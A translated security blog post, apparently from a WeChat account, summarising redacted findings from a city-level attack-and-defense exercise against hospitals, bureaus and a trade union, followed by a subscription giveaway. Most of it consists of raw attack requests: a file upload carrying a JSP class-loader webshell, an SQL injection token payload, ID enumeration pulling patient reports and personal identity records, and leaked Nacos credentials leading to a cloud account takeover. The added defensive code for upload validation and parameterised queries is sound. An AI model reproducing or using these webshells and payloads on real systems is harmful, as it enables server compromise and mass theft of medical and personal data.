Main text
The month before last I took part in a prefecture-level city's attack-and-defense exercise. Here is a small selection of the reports, merged together (if you're here for the giveaway, just scroll to the end~~) (redacting all of this nearly killed me~)
Company X: unauthenticated access + file upload getshell
http://xxx.xxx.xxx:9081
File upload getshell
POST /api/portal/v1/file/upload?lang=zh_CN HTTP/1.1
Host: xxx.xxx.xxx:9081
Content-Length: 1230
Accept: application/json, text/plain, */*
Tenant-Code: WS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBWAvbx7URctPS3
Origin:
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: _cmslang=zh_CN; sajssdk_2015_cross_new_user=1; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_search_keyword%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_referrer%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMThmY2NiMGQyOTFhY2MtMGQ4Y2QxNGI4MDJjZjMtNGM2NTdiNTgtMTM5NTM5Ni0xOGZjY2IwZDI5MjE4NTQifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%7D
Connection: close
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="file"; filename="11.jsp"
Content-Type: image/png
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="type"
NEWS
------WebKitFormBoundaryytBWAvbx7URctPS3--
https://xxx.xxx.xxx/static_resources/draft/news/xxxx/xxxxx.jsp
Password: passwd
Hospital X: data of a million-plus users exposed
Viewing physical-examination reports
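The upload above got through because the server trusted a part named `11.jsp` that merely claimed `Content-Type: image/png`. As an added example (not code from the original post or the affected product), this is the server-side check that would have rejected it: the client's declared type is never the deciding factor; an extension allowlist, magic bytes and a server-chosen file name are. The allowlist and name length are assumptions.

```python
# Added example (not from the original post): server-side validation that would
# have rejected the upload above, where the part is named "11.jsp" but carries a
# forged "Content-Type: image/png". The client's Content-Type is never trusted;
# the decision uses an extension allowlist, magic bytes and a server-chosen name.
import os
import re
import secrets

ALLOWED = {
    # extension -> magic-byte prefixes a genuine file of that type starts with
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_TYPES = ("image/png", "image/jpeg", "image/gif")
# Anything a Java web container might execute, wherever it sits in the name
# (catches 11.jsp as well as double extensions such as x.jsp.png).
EXECUTABLE = re.compile(r"\.(jspx?|jsw|jsv|jtml|war|class)(\.|$)", re.IGNORECASE)


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (ok, reason, stored_name); rejects before any byte reaches disk."""
    base = os.path.basename(filename or "")
    if not base or base != filename:
        return False, "path component in filename", None
    if EXECUTABLE.search(base):
        return False, "server-executable extension", None
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not in allowlist", None
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        # The JSP above begins with "<%!", not with a PNG header.
        return False, "content does not match extension", None
    if declared_type.split(";")[0].strip() not in ALLOWED_TYPES:
        return False, "declared type not an allowed image type", None
    # Never reuse the client's name: random name + allowlisted extension, to be
    # written under a directory the servlet container does not execute from.
    return True, "ok", secrets.token_hex(16) + ext
```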
POST /app-api/examination/getInspectionList HTTP/1.1
Host: xxx.xxx.xxx:18145
Content-Length: 70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Authorization: Bearer b78b2e2f-b162-4528-ba26-38ff5da78f87
Apptoken: 5891187f4fe91f58bb0fdcf8216254a6d71d43bbe198e86f92a70648f2bc55c9e8cc344fa9b4fa0126c2b78d9891aa71d276a1b8ec0c48b0f20c452f5d129da2f31a907799852ae1cca039a8277d19d4339f19e02116487d737686472fe212bc810e9e61fcde11436e0494459e46bd59cc84fe78097e94f631a694bbb0340a4a0f14f2fefbf4e4b1f8065b28647cec0ff0178d1b4ea44f444bda289f84d1b53cb5a8dc0ed7531dd5c327e4dea7ecaa853eed0acc41652d2205228d6c12a108bb
Content-Type: application/json
Accept: */*
Origin:
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
{"queryType":8,"queryValue":"6363","month":"2024-05","needPage":false}
Iterating queryValue from 0 to 3000000 returns a report for every value without gaps. This one is 2225636
This one is 808
Viewing user order information
POST /app-manage/inHospital/getInpatientPayList HTTP/1.1
Host: xxx.xxx.xxx:18145
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
VERSION: test
Content-Length: 46
{"pageSize": 100,"needPage": true,"pageNo": 1}
Simply changing pageSize to 10000 is enough.
Hospital X: five-factor personal data of a million-plus users exposed
The site was found through the mini-program.
Iterating uid returns the five factors: ID-card number, name, phone number, address and date of birth
POST /xxxx/xxxx/xxxlativeList HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 24
Xweb_xhr: 1
Orgcode: 18477
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x6309071d) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
hCode=18477&uid=39701982
Iterating uid yields millions of sensitive records: roughly 500 requests produced about 250 rows. There should be about 4 million uids in total, so roughly 2 million five-factor records.
Some uids expose the five factors of the whole family: parents, the user, spouse and so on.
With the data obtained here, one can also retrieve the user's inpatient records, imaging records, payment records, invoices, registration records and surgery records.
Bureau X: database access + getshell
Nacos leaked the PostgreSQL database connection password
Obtaining database access
After connecting, went straight to command execution
rabbitmq
Bureau X: takeover of all user accounts + SQL injection yielding 26 Oracle databases, 40 database users and DBA privileges
The site was again found through a mini-program.
Obtaining the usernames and plaintext passwords of all company administrators, plus the administrators' phone numbers, ID-card numbers and so on. Clicking on any one enterprise
automatically sends the request
The leaked information is as follows
The company administrator's account and password are leaked; trying them, the login succeeds. Login URL: https://xxx.xxx.xxx/
The final leak: accounts and passwords of 1161 companies. After logging into a company account one can obtain the ID-card numbers, phone numbers and email addresses of the related persons.
With the account and password one can log in
Click to enter the system
A large number of video-surveillance permissions become available: live feeds, plus the tokens for the surveillance of various localities
All accounts use a weak password: the phone number is taken from the back end and the password is a123456
SQL injection
Request
POST /cxmStatic/dashboard/1/list HTTP/1.1
Host: xxx.xxx.xxx
Cookie:
Content-Length: 14
Accept-Encoding: gzip, deflate, br
Apptype: WEIXIN_MINI
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxNDUwNjc6V0VJWElOX01JTkkiLCJleHAiOjE3MTU5NjQwNTEsImlhdCI6MTcxNTk0OTY1MX0.qUHwdpcRccIg4Nct5i58qPxZ6OiV9PfBhHilWhyIG_0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Charset: UTF-8
Xweb_xhr: 1
X-Requested-With: XMLHttpRequest
Appid: wx67d2416db3cb5b69
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
Connection: close
zoneId=511827*
Databases: 26 in total
Database users: 40 in total
One of the databases holds 256 tables
The databases contain three-factor personal data
Hospital X: horizontal privilege escalation exposing the examination reports of 200k+ patients
The request is as follows; any token you generate yourself will do. To generate a token, send the following request:
POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineeIcno":"123"}
POST /sj-bifrost-web/report/detail HTTP/2
Host: xxx.xxx.xxx
Content-Length: 101
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
{"token":"F83BA1402B2A8AABB3D042115500D571D3A1685910B84F00B907689BA4ED0547","serviceNumber":"199245"}
Iterating serviceNumber lets you view other people's reports. The ID-card number is still tied to the token, but the report depends only on serviceNumber; serviceNumber was iterated from 0 to 300k.
Here the id was iterated from 0 to 200k and every value returned data.
Affiliated hospital of college X: unauthenticated SQL injection yielding 58,387 citizens' records
Obtaining a token via the following request
POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 31
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineePhone":"' or '1'='1"}
Using the token to obtain three-factor data
GET /sj-bifrost-web/report/reportOrderList?token=8ED9D6B38CDBF617724060160F957101311CFF26B28F48D18CFFDCA22C3D7A62 HTTP/2
Host: xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
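The two hospital findings above fail at the same two points: /report/generateToken splices examineePhone into SQL, so `' or '1'='1` matches every row, and /report/detail looks a report up by serviceNumber alone, so the token never constrains whose report comes back. As an added example (not code from the original post or the affected system), both fixes are modelled here against an in-memory SQLite table; the schema, column names and token format are assumptions.

```python
# Added example (not from the original post): the two server-side fixes for the
# /report/generateToken and /report/detail flows described above, modelled with
# an in-memory SQLite table. Schema, column names and token format are assumptions.
import secrets
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE examinee (icno TEXT, phone TEXT)")
conn.execute("CREATE TABLE report (service_number TEXT, icno TEXT, body TEXT)")
conn.executemany("INSERT INTO examinee VALUES (?, ?)",
                 [("123", "13800000001"), ("456", "13800000002")])   # constructed rows
conn.executemany("INSERT INTO report VALUES (?, ?, ?)",
                 [("199245", "123", "report of 123"), ("199246", "456", "report of 456")])
TOKENS = {}  # token -> icno it was issued for; server-side only, opaque to the client

def _issue(icno):
    tok = secrets.token_hex(32)
    TOKENS[tok] = icno
    return tok

def generate_token_unsafe(phone):
    # The pattern the payload "' or '1'='1" defeats: the value is spliced into the
    # SQL text, the predicate becomes always-true and a token is issued for the
    # first examinee in the table without knowing anyone's phone number.
    row = conn.execute(f"SELECT icno FROM examinee WHERE phone = '{phone}'").fetchone()
    return _issue(row[0]) if row else None

def generate_token(phone):
    # Parameter binding: the phone is data, never SQL, so the payload matches no row.
    row = conn.execute("SELECT icno FROM examinee WHERE phone = ?", (phone,)).fetchone()
    return _issue(row[0]) if row else None

def report_detail(token, service_number):
    """Return the report only if it belongs to the examinee the token was issued for."""
    icno = TOKENS.get(token)
    if icno is None:
        return None
    # The ownership predicate lives in the query itself, so iterating serviceNumber
    # under one token can only ever return that examinee's own reports.
    row = conn.execute("SELECT body FROM report WHERE service_number = ? AND icno = ?",
                       (service_number, icno)).fetchone()
    return row[0] if row else None
```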
Trade union X: cloud account takeover + getshell
An AccessKey (AK) leaked in Nacos led to the cloud takeover
aliyun:
  textAudit:
    accessKeyId: xxxxxxxxx
    secret: xxxxxxxxxxxxx
    endpoint: xxxxxxxxxxxxxx
Obtaining the Alibaba Cloud account and password
Login succeeded; obtained control of one Alibaba Cloud server
Terminal control from the Alibaba Cloud console gives RCE / getshell directly
The account also owns a large number of resources, as shown below: control of multiple domains, servers, multiple storage buckets, gateways, the SMS service, live video streaming and DNS, 51 resources in total
Trade union X: Nacos authentication bypass + database access
http://xxx.xxx.xxx:28848/nacos/
### redis service
redisInfo:
  host: xxxxxxxxxx
  port: xxxxxxxx
  password: xxxxxxxxxxx
  database: 0
### mysql service
custom:
  mysql:
    master:
      connect: xxxxxxxx
      username: xxxxxx
      password: xxxxxxxx
    slave:
      connect: xxxxxxxxx/xxxxxx
      username: xxxxxxxxxx
      password: xxxxxxx
dxb:
  httpUrl: xxxxxxxxxx
  dxbUsername: xxxx
  dxbPassword: xxxxx
rabbitmq:
  host: xxxxxxx
  port: xxxxxx
  username: xxxxxxx
  password: xxxxxxxxxxxx
Leaked WeChat API key (appid) and secret
Obtaining the access token: https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=xxxxx&secret=xxxxxxxxxxxxxxx
https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ak (with this access token the official account can be managed)
Giveaway at the end
To thank the many masters who have long supported our team, we have decided to give away more slots!
Note: this giveaway can be combined with the one in the earlier Knowledge Planet introduction!! If luck strikes twice and you win both, you get two free years.
For details on the Knowledge Planet, see here~~
Before the draw, share this article to your Moments (no group restriction and no visibility-date restriction) to qualify for a free slot (note: sharing after the draw, or sharing with a group or visibility-date restriction, will not be honoured)
Originally published on the WeChat public account 实战安全研究: "Scoring tens of thousands of points in a prefecture-level HVV (护网), all in one read (giveaway at the end)"